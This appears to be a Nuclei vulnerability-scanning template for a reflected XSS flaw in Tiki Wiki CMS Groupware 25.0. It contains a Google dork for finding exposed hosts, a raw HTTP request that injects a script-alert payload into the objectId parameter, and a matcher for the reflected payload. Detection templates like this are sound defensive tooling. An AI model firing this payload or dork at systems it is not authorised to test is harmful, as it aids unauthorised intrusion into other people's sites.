id:  Tiki-software-community-association-xss
info:
  name: Tiki Software Community Association Reflected XSS
  author: wjlin0
  severity: low
  description: Tiki Wiki CMS Groupware 25.0  存在反射XSS
  metadata:
    google-query: 'inurl:"tiki-ajax_services.php"'
  reference:
    - https://cxsecurity.com/issue/WLB-2023010016
  tags: xss,reflected
http:
  - raw:
      - |+
        GET /tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)<%2fscript> HTTP/2
        Host: {{Hostname}}
      
    matchers:
      - type: word
        part: body
        words:
          - <script>alert(document.domain)</script>
# digest: 4b0a00483046022100ef64933276b074a9149eb5bc8b8ee312b94aa11d77865fa8ef2a7eaf6cbccd39022100f9f0f4426b25ed9204484af927ad22c5c1c8508d667a38c567d37cd099874d00:9d8cf424f0e932381bf27cf1e926b867